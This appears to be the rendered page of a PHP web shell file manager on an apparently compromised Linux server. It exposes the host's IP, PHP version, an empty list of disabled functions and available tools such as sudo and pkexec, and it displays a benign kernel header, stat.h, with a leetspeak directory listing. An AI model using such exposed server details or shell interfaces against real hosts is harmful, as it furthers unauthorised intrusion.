Server IP : 103.169.32.36 / Your IP : 216.73.217.13 Web Server : Apache System : Linux web.dpmptsp 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64 User : apache ( 48) PHP Version : 5.6.40 Disable Function : NONE MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /usr/include/asm/ |
Upload File : |
| Current File : /usr/include/asm/stat.h |
#ifndef _ASM_X86_STAT_H
#define _ASM_X86_STAT_H
#define STAT_HAVE_NSEC 1
#ifdef __i386__
struct stat {
unsigned long st_dev;
unsigned long st_ino;
unsigned short st_mode;
unsigned short st_nlink;
unsigned short st_uid;
unsigned short st_gid;
unsigned long st_rdev;
unsigned long st_size;
unsigned long st_blksize;
unsigned long st_blocks;
unsigned long st_atime;
unsigned long st_atime_nsec;
unsigned long st_mtime;
unsigned long st_mtime_nsec;
unsigned long st_ctime;
unsigned long st_ctime_nsec;
unsigned long __unused4;
unsigned long __unused5;
};
/* We don't need to memset the whole thing just to initialize the padding */
#define INIT_STRUCT_STAT_PADDING(st) do { \
st.__unused4 = 0; \
st.__unused5 = 0; \
} while (0)
#define STAT64_HAS_BROKEN_ST_INO 1
/* This matches struct stat64 in glibc2.1, hence the absolutely
* insane amounts of padding around dev_t's.
*/
struct stat64 {
unsigned long long st_dev;
unsigned char __pad0[4];
unsigned long __st_ino;
unsigned int st_mode;
unsigned int st_nlink;
unsigned long st_uid;
unsigned long st_gid;
unsigned long long st_rdev;
unsigned char __pad3[4];
long long st_size;
unsigned long st_blksize;
/* Number 512-byte blocks allocated. */
unsigned long long st_blocks;
unsigned long st_atime;
unsigned long st_atime_nsec;
unsigned long st_mtime;
unsigned int st_mtime_nsec;
unsigned long st_ctime;
unsigned long st_ctime_nsec;
unsigned long long st_ino;
};
/* We don't need to memset the whole thing just to initialize the padding */
#define INIT_STRUCT_STAT64_PADDING(st) do { \
memset(&st.__pad0, 0, sizeof(st.__pad0)); \
memset(&st.__pad3, 0, sizeof(st.__pad3)); \
} while (0)
#else /* __i386__ */
struct stat {
unsigned long st_dev;
unsigned long st_ino;
unsigned long st_nlink;
unsigned int st_mode;
unsigned int st_uid;
unsigned int st_gid;
unsigned int __pad0;
unsigned long st_rdev;
long st_size;
long st_blksize;
long st_blocks; /* Number 512-byte blocks allocated. */
unsigned long st_atime;
unsigned long st_atime_nsec;
unsigned long st_mtime;
unsigned long st_mtime_nsec;
unsigned long st_ctime;
unsigned long st_ctime_nsec;
long __unused[3];
};
/* We don't need to memset the whole thing just to initialize the padding */
#define INIT_STRUCT_STAT_PADDING(st) do { \
st.__pad0 = 0; \
st.__unused[0] = 0; \
st.__unused[1] = 0; \
st.__unused[2] = 0; \
} while (0)
#endif
/* for 32bit emulation and 32 bit kernels */
struct __old_kernel_stat {
unsigned short st_dev;
unsigned short st_ino;
unsigned short st_mode;
unsigned short st_nlink;
unsigned short st_uid;
unsigned short st_gid;
unsigned short st_rdev;
#ifdef __i386__
unsigned long st_size;
unsigned long st_atime;
unsigned long st_mtime;
unsigned long st_ctime;
#else
unsigned int st_size;
unsigned int st_atime;
unsigned int st_mtime;
unsigned int st_ctime;
#endif
};
#endif /* _ASM_X86_STAT_H */
| N4m3 |
5!z3 |
L45t M0d!f!3d |
0wn3r / Gr0up |
P3Rm!55!0n5 |
0pt!0n5 |
| .. |
-- |
September 29 2025 07:00:20 |
0 / 0 |
0755 |
|
| | | | | |
| a.out.h |
0.677 KB |
June 04 2024 14:55:01 |
0 / 0 |
0644 |
|
| auxvec.h |
0.472 KB |
June 04 2024 14:55:01 |
0 / 0 |
0644 |
|
| bitsperlong.h |
0.224 KB |
June 04 2024 14:55:01 |
0 / 0 |
0644 |
|
| boot.h |
0.254 KB |
June 04 2024 14:55:01 |
0 / 0 |
0644 |
|
| bootparam.h |
4.394 KB |
June 04 2024 14:55:01 |
0 / 0 |
0644 |
|
| bpf_perf_event.h |
0.039 KB |
June 04 2024 14:55:01 |
0 / 0 |
0644 |
|
| byteorder.h |
0.134 KB |
June 04 2024 14:55:01 |
0 / 0 |
0644 |
|
| debugreg.h |
3.146 KB |
June 04 2024 14:55:01 |
0 / 0 |
0644 |
|
| e820.h |
2.63 KB |
June 04 2024 14:55:01 |
0 / 0 |
0644 |
|
| errno.h |
0.03 KB |
June 04 2024 14:55:01 |
0 / 0 |
0644 |
|
| fcntl.h |
0.03 KB |
June 04 2024 14:55:01 |
0 / 0 |
0644 |
|
| hw_breakpoint.h |
0.006 KB |
June 04 2024 14:55:01 |
0 / 0 |
0644 |
|
| hyperv.h |
12.984 KB |
June 04 2024 14:55:01 |
0 / 0 |
0644 |
|
| ioctl.h |
0.03 KB |
June 04 2024 14:55:01 |
0 / 0 |
0644 |
|
| ioctls.h |
0.031 KB |
June 04 2024 14:55:01 |
0 / 0 |
0644 |
|
| ipcbuf.h |
0.031 KB |
June 04 2024 14:55:01 |
0 / 0 |
0644 |
|
| ist.h |
0.771 KB |
June 04 2024 14:55:01 |
0 / 0 |
0644 |
|
| kvm.h |
6.806 KB |
June 04 2024 14:55:01 |
0 / 0 |
0644 |
|
| kvm_para.h |
2.801 KB |
June 04 2024 14:55:01 |
0 / 0 |
0644 |
|
| kvm_perf.h |
0.317 KB |
June 04 2024 14:55:01 |
0 / 0 |
0644 |
|
| ldt.h |
0.94 KB |
June 04 2024 14:55:01 |
0 / 0 |
0644 |
|
| mce.h |
1.219 KB |
June 04 2024 14:55:01 |
0 / 0 |
0644 |
|
| mman.h |
1.01 KB |
June 04 2024 14:55:01 |
0 / 0 |
0644 |
|
| msgbuf.h |
0.031 KB |
June 04 2024 14:55:01 |
0 / 0 |
0644 |
|
| msr-index.h |
29.037 KB |
June 04 2024 14:55:01 |
0 / 0 |
0644 |
|
| msr.h |
0.276 KB |
June 04 2024 14:55:01 |
0 / 0 |
0644 |
|
| mtrr.h |
4.063 KB |
June 04 2024 14:55:01 |
0 / 0 |
0644 |
|
| param.h |
0.03 KB |
June 04 2024 14:55:01 |
0 / 0 |
0644 |
|
| perf_regs.h |
1.24 KB |
June 04 2024 14:55:01 |
0 / 0 |
0644 |
|
| poll.h |
0.029 KB |
June 04 2024 14:55:01 |
0 / 0 |
0644 |
|
| posix_types.h |
0.157 KB |
June 04 2024 14:55:01 |
0 / 0 |
0644 |
|
| posix_types_32.h |
0.686 KB |
June 04 2024 14:55:01 |
0 / 0 |
0644 |
|
| posix_types_64.h |
0.533 KB |
June 04 2024 14:55:01 |
0 / 0 |
0644 |
|
| posix_types_x32.h |
0.506 KB |
June 04 2024 14:55:01 |
0 / 0 |
0644 |
|
| prctl.h |
0.186 KB |
June 04 2024 14:55:01 |
0 / 0 |
0644 |
|
| processor-flags.h |
6.316 KB |
June 04 2024 14:55:01 |
0 / 0 |
0644 |
|
| ptrace-abi.h |
1.756 KB |
June 04 2024 14:55:01 |
0 / 0 |
0644 |
|
| ptrace.h |
1.165 KB |
June 04 2024 14:55:01 |
0 / 0 |
0644 |
|
| resource.h |
0.033 KB |
June 04 2024 14:55:01 |
0 / 0 |
0644 |
|
| sembuf.h |
0.683 KB |
June 04 2024 14:55:01 |
0 / 0 |
0644 |
|
| setup.h |
0.006 KB |
June 04 2024 14:55:01 |
0 / 0 |
0644 |
|
| shmbuf.h |
0.031 KB |
June 04 2024 14:55:01 |
0 / 0 |
0644 |
|
| sigcontext.h |
5.106 KB |
June 04 2024 14:55:01 |
0 / 0 |
0644 |
|
| sigcontext32.h |
1.645 KB |
June 04 2024 14:55:01 |
0 / 0 |
0644 |
|
| siginfo.h |
0.421 KB |
June 04 2024 14:55:01 |
0 / 0 |
0644 |
|
| signal.h |
2.771 KB |
June 04 2024 14:55:01 |
0 / 0 |
0644 |
|
| socket.h |
0.031 KB |
June 04 2024 14:55:01 |
0 / 0 |
0644 |
|
| sockios.h |
0.032 KB |
June 04 2024 14:55:01 |
0 / 0 |
0644 |
|
| stat.h |
2.893 KB |
June 04 2024 14:55:01 |
0 / 0 |
0644 |
|
| statfs.h |
0.345 KB |
June 04 2024 14:55:01 |
0 / 0 |
0644 |
|
| svm.h |
5.09 KB |
June 04 2024 14:55:01 |
0 / 0 |
0644 |
|
| swab.h |
0.646 KB |
June 04 2024 14:55:01 |
0 / 0 |
0644 |
|
| termbits.h |
0.033 KB |
June 04 2024 14:55:01 |
0 / 0 |
0644 |
|
| termios.h |
0.032 KB |
June 04 2024 14:55:01 |
0 / 0 |
0644 |
|
| types.h |
0.11 KB |
June 04 2024 14:55:01 |
0 / 0 |
0644 |
|
| ucontext.h |
0.331 KB |
June 04 2024 14:55:01 |
0 / 0 |
0644 |
|
| unistd.h |
0.289 KB |
June 04 2024 14:55:01 |
0 / 0 |
0644 |
|
| unistd_32.h |
9.368 KB |
June 04 2024 14:55:01 |
0 / 0 |
0644 |
|
| unistd_64.h |
8.587 KB |
June 04 2024 14:55:01 |
0 / 0 |
0644 |
|
| unistd_x32.h |
15.115 KB |
June 04 2024 14:55:01 |
0 / 0 |
0644 |
|
| vm86.h |
2.983 KB |
June 04 2024 14:55:01 |
0 / 0 |
0644 |
|
| vmx.h |
6.529 KB |
June 04 2024 14:55:01 |
0 / 0 |
0644 |
|
| vsyscall.h |
0.366 KB |
June 04 2024 14:55:01 |
0 / 0 |
0644 |
|